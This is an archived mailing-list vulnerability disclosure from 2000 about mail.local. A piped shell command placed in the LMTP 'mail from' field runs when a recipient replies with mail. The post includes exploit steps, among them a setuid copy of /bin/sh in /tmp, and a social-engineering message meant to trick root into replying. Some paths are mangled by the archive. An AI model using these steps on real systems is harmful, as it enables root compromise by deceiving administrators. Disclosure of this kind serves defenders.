mailing list archives
vulnerability in mail.local
From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Wed, 1 Nov 2000 18:57:10 GMT
mail.local is a little setuid root prog designed, like its name suggest, for
local mail delivering.
Used with the -l option, we have an interactive mode in lmtp protocol (
simplified smtp for local mail delivery only )
A weakness exists in the 'mail from' field that allow any local user to
insert a piped shell command that may be executed
by the recipient when he does a reply with the mail command. A little
social engineering skill should help to root the boxe.
Finally, mail.local shouldn't allow such escape chars even in the mail from
field and the command mail shouldn't allow such
a reply through a pipe.
A space char in the command will finish the string, so either u use a single
command like '|reboot' or use a comma that should
be converted in space by mail.
Linux 2.4.0 beta Caldera that was freely distributed during the defcon 00 is
vulnerable to this pb.
That looks like the old sendmail bugs
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
#cp exploit /firstname.lastname@example.org
#chmod a+x /email@example.com
mail from:<|/firstname.lastname@example.org> U can use many senders to hide the evil
Subject:I have a problem
I need higher priviledge on this machine, can u do something for me please ?
(now wait for a reply and then, )
#echo 'very nice, thanx a lot' | mail -s 'thanx' root // With
Have a nice day,
1001 bd Maisonneuve Ouest, suite 200
Montreal (Quebec) H3A 3C8 CANADA
c3rb3r () hotmail com
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Share information about yourself, create your own public profile at
- vulnerability in mail.local gregory duchemin (Nov 04)